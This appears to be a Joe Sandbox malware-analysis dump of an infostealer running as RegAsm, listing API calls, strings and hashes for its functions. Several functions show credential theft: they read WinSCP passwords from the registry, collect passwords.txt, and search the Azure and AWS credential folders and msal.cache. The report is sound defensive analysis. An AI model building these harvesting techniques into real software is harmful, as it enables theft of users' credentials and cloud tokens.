SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409591
??_U@YAPAXI@Z.MSVCRT ref: 0040959B
ReadFile.KERNEL32(00000000,00000000,00000000,00420CA3,00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF), ref: 004095AE
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095BB
HeapAlloc.KERNEL32(00000000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095C2
StrStrA.SHLWAPI(00000000,01571F28,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095D3
StrStrA.SHLWAPI(-00000010,01572000,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004095EE
lstrcat.KERNEL32(000000FF,0156F700), ref: 00409604
lstrcat.KERNEL32(000000FF,00000000), ref: 00409617
lstrcat.KERNEL32(000000FF,00427C54), ref: 00409626
lstrcat.KERNEL32(000000FF,00000000), ref: 00409639
lstrcat.KERNEL32(000000FF,00427C58), ref: 00409648
lstrcat.KERNEL32(000000FF,0156F710), ref: 00409658
lstrcat.KERNEL32(000000FF,-00000010), ref: 00409663
lstrcat.KERNEL32(000000FF,00427C5C), ref: 00409672
StrStrA.SHLWAPI(-000000FE,01571A38,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409683
StrStrA.SHLWAPI(00000014,015718B8,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409694
lstrcat.KERNEL32(000000FF,0156F7F0), ref: 004096AA

Part of subcall function 00409330: memset.MSVCRT ref: 00409359
Part of subcall function 00409330: lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
Part of subcall function 00409330: CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
Part of subcall function 00409330: memcpy.MSVCRT ref: 004093F1

lstrcat.KERNEL32(000000FF,00000000), ref: 004096BE
lstrcat.KERNEL32(000000FF,00427C60), ref: 004096CD
StrStrA.SHLWAPI(-000000FE,015718B8,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096DE
StrStrA.SHLWAPI(00000014,0156F780,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 004096EF
lstrcat.KERNEL32(000000FF,01572240), ref: 00409705

Part of subcall function 00409330: lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D

lstrcat.KERNEL32(000000FF,00000000), ref: 00409719
lstrcat.KERNEL32(000000FF,00427C64), ref: 00409728
lstrcat.KERNEL32(000000FF,00427C68), ref: 00409737
StrStrA.SHLWAPI(-00000002,01571F28,?,?,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 00409748
lstrlen.KERNEL32(000000FF,?,?,0000000A,?,?,?,?,00000000,00420CA3,000000FF,?,0040A951), ref: 0040975C
memset.MSVCRT ref: 004097B1
CloseHandle.KERNEL32(00000000), ref: 004097BA

Strings

passwords.txt, xrefs: 0040976F

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$lstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
String ID: passwords.txt
API String ID: 2388354673-347816968
Opcode ID: c4180ada5debfbc46418ee8b8bcea4be99ce4cf089749fd728cfa25a298dbedc
Instruction ID: 0c1f35d45bd3c2b6c9383514b9817522ff8a3a891fab0831307e9c008aa627d4
Opcode Fuzzy Hash: c4180ada5debfbc46418ee8b8bcea4be99ce4cf089749fd728cfa25a298dbedc
Instruction Fuzzy Hash: 78B1C375900205EBDB10EBA0DC59FEE7BB9BF1A304F540519FA02A3291DF785A48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73E Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
lstrcat.KERNEL32(00421610,?), ref: 0040C78C
RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
lstrcat.KERNEL32(00421610,?), ref: 0040C848
lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921

Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B

memset.MSVCRT ref: 0040C932
memset.MSVCRT ref: 0040C940
lstrlen.KERNEL32(00421610), ref: 0040C958
memset.MSVCRT ref: 0040C9AB

Strings

passwords.txt, xrefs: 0040C96B
UserName, xrefs: 0040C82E
Password, xrefs: 0040C86E
HostName, xrefs: 0040C772
Host: , xrefs: 0040C755
PortNumber, xrefs: 0040C7A3
Login: , xrefs: 0040C811
Soft: WinSCP, xrefs: 0040C746
Password: , xrefs: 0040C880

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
String ID: Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
API String ID: 2902345061-4040920679
Opcode ID: 1931a26709b873a9a79a9113923cd97d7f2f2d3008c82f8dd77ed5c2946b83cf
Instruction ID: 15f759088607e9964790177d35be8adeac096382de0593ff92e4df6e6086aa5c
Opcode Fuzzy Hash: 1931a26709b873a9a79a9113923cd97d7f2f2d3008c82f8dd77ed5c2946b83cf
Instruction Fuzzy Hash: 17717FB1D0021AABCB04DBE4DC95EFFB779EB48304F50455AF615A3180D6785E488B74

Uniqueness

Uniqueness Score: -1.00%

Function 1C335660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

_node, xrefs: 1C33579E
CREATE TABLE x(%.*s INT, xrefs: 1C3357CA
,%.*s, xrefs: 1C335804, 1C335835
Auxiliary rtree columns must be last, xrefs: 1C3356B3, 1C3358B3

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
API String ID: 0-209218429
Opcode ID: a5ed08edb186c34f29dd312f0c1abc5c15be0581eee28565256844d160e16339
Instruction ID: a8232b7b5657dfb5e6289e9bbee873b3f33b17644637b1e065fa149b0c2dfb48
Opcode Fuzzy Hash: a5ed08edb186c34f29dd312f0c1abc5c15be0581eee28565256844d160e16339
Instruction Fuzzy Hash: 09F1F2B5608311DFD710CF24C880A9BB7F8AF48305F041629E98A97292D736F959CFB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C26D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

unicode61, xrefs: 1C26D90B
porter, xrefs: 1C26D8EE
fts3_tokenizer, xrefs: 1C26D921
fts4aux, xrefs: 1C26D840
fts4, xrefs: 1C26D9F0
optimize, xrefs: 1C26D9A4
offsets, xrefs: 1C26D956
matchinfo, xrefs: 1C26D970, 1C26D98A
simple, xrefs: 1C26D8A9
snippet, xrefs: 1C26D93C
fts3tokenize, xrefs: 1C26DA27
fts3, xrefs: 1C26D9CA

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: ebf4d3d7270ae1342417e111c410414f65d63a48f9be4d9b221d31120099be0d
Instruction ID: 36fea446b257058ac8f0e0d8a15c6edf3193ab9f6ec19be45a886d17780f357c
Opcode Fuzzy Hash: ebf4d3d7270ae1342417e111c410414f65d63a48f9be4d9b221d31120099be0d
Instruction Fuzzy Hash: CC5119B4B0D336A7E2105E655C85FDB76A85F14A18F240134FD04A2B42E778EAC982F7

Uniqueness

Uniqueness Score: -1.00%

Function 1C3E7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname1, xrefs: 1C3E817B
winGetTempname4, xrefs: 1C3E8355
etilqs_, xrefs: 1C3E824C
winGetTempname2, xrefs: 1C3E8094
winGetTempname5, xrefs: 1C3E8233

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: 9c52a3dec9f7a9a87c18cd1156379e680e07028670a35d80ed41132f3656861b
Instruction ID: 75c4c1fb19106f08e89fd11bd7470efc4bf40c9645de3124b2293d878eeaff26
Opcode Fuzzy Hash: 9c52a3dec9f7a9a87c18cd1156379e680e07028670a35d80ed41132f3656861b
Instruction Fuzzy Hash: EAA1BDB5A442215BE7108F28AC41BEB77A99F42315F140265FD849B183E62BE50FCBF3

Uniqueness

Uniqueness Score: -1.00%

Function 004022D0 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 63stringmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,0000000F,00418875), ref: 004022E2
strlen.MSVCRT ref: 00402307
strlen.MSVCRT ref: 00402311
strlen.MSVCRT ref: 0040231B
strlen.MSVCRT ref: 00402323
strlen.MSVCRT ref: 00402340
strlen.MSVCRT ref: 0040234A
strlen.MSVCRT ref: 00402360
strlen.MSVCRT ref: 0040236A
strlen.MSVCRT ref: 00402374
strlen.MSVCRT ref: 0040237E

Strings

Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040230C
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402379
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402345
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 00402333
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040235B
Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. , xrefs: 0040236F
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402316
The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs)., xrefs: 00402302
At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva., xrefs: 00402365

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$AllocLocal
String ID: At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$At the conclusion of the final night of competition Ana Paola De la Parra of San Pedro Garza Garc?a was crowned the winner. De la Parra was crowned by outgoing Nuestra Belleza Nuevo Le?n titleholder Alejandra Villanueva.$Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $Nuestra Belleza Nuevo Le?n 2004, was held at Las Lomas Eventos in Monterrey, Nuevo Le?n on July 6, 2004. $The Near-Earth Object Confirmation Page (NEOCP) is a web service listing recently-submitted observations of objects that may be near-Earth objects (NEOs).
API String ID: 710835760-1224611842
Opcode ID: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
Instruction ID: f498ca94b0cf780e3660f044cf5a8bded02fdd4dda412cde648ac572d59e650e
Opcode Fuzzy Hash: 4b52ff8d1b4edfea4f766211d09d292b0e16e17e016467cf2f504a4323e89b8a
Instruction Fuzzy Hash: DD11E639748220AB8710BEAF9CD3AC9B755AF84704B984067FD18A3282C57D5C4042B9

Uniqueness

Uniqueness Score: -1.00%

Function 00417CE0 Relevance: 28.6, APIs: 10, Strings: 9, Instructions: 145stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00417D11

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 00417D37
lstrcat.KERNEL32(?,\.azure\), ref: 00417D54

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F

memset.MSVCRT ref: 00417D93
lstrcat.KERNEL32(?,00000000), ref: 00417DBF
lstrcat.KERNEL32(?,\.aws\), ref: 00417DDC

Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
Part of subcall function 00417800: lstrcat.KERNEL32(?,0156F900), ref: 00417963
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9

memset.MSVCRT ref: 00417E1B
lstrcat.KERNEL32(?,00000000), ref: 00417E47
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417E64

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C

memset.MSVCRT ref: 00417EA3

Strings

*.*, xrefs: 00417D5F
*.*, xrefs: 00417DE7
\.azure\, xrefs: 00417D48
Azure\.IdentityService, xrefs: 00417E6A
Azure\.azure, xrefs: 00417D5A
msal.cache, xrefs: 00417E6F
\.aws\, xrefs: 00417DD0
Azure\.aws, xrefs: 00417DE2
\.IdentityService\, xrefs: 00417E58

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 515946987-974132213
Opcode ID: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
Instruction ID: 1b53bb84b6d4d4d6c781053bd63c720a49e678cd70851be9322f010e7c87751d
Opcode Fuzzy Hash: da2b9637284faa4cf485b5091821e05eb1918fa99dd6be4bbb53a7ca8194cac4
Instruction Fuzzy Hash: 3051F571900219ABCB14EBA0CC46FED7778AB1C704F64466EBA54631C2EF7C5B48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1C375D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

automerge, xrefs: 1C375E59
usermerge, xrefs: 1C375EAD
deletemerge, xrefs: 1C375F64
secure-delete, xrefs: 1C376031
hashsize, xrefs: 1C375DF0
crisismerge, xrefs: 1C375EF7
pgsz, xrefs: 1C375D81
rank, xrefs: 1C375FBB

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: b230091b9b2d9b2135ff17d626fd0f988b0c74508e343ede8dddab866bbaa7ce
Instruction ID: 2774f70836f59df3673dafaae0efd4d85403a8a75910405758b260b46b840a1f
Opcode Fuzzy Hash: b230091b9b2d9b2135ff17d626fd0f988b0c74508e343ede8dddab866bbaa7ce
Instruction Fuzzy Hash: D77168BAB043514BD605DA1AAC00ADF77E0EF85212F040979F942C3241EB29E95E8FF7

Uniqueness

Uniqueness Score: -1.00%

Function 1C265E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C265F2B, 1C266253, 1C266385
misuse, xrefs: 1C265F35, 1C26625D, 1C26638F
recursive definition for %s.%s, xrefs: 1C265E4C
SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 1C265E6F
%s at line %d of [%.10s], xrefs: 1C265F3A, 1C266262, 1C266394
no such fts5 table: %s.%s, xrefs: 1C2662EA
API called with finalized prepared statement, xrefs: 1C265F1F, 1C266247, 1C266379

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: cd0fea25917dd697bdd5e063f8ce5d8e416705c194efe803b96016d7da55695d
Instruction ID: 733a061d766052148ab2ac7bd597f264938f80823d891fe8c6002525d1e67110
Opcode Fuzzy Hash: cd0fea25917dd697bdd5e063f8ce5d8e416705c194efe803b96016d7da55695d
Instruction Fuzzy Hash: 0402D4B4A047629BE720CF29CC44B9B77E4BF44304F204528FD8997642E775E999CBB2

Uniqueness

Uniqueness Score: -1.00%

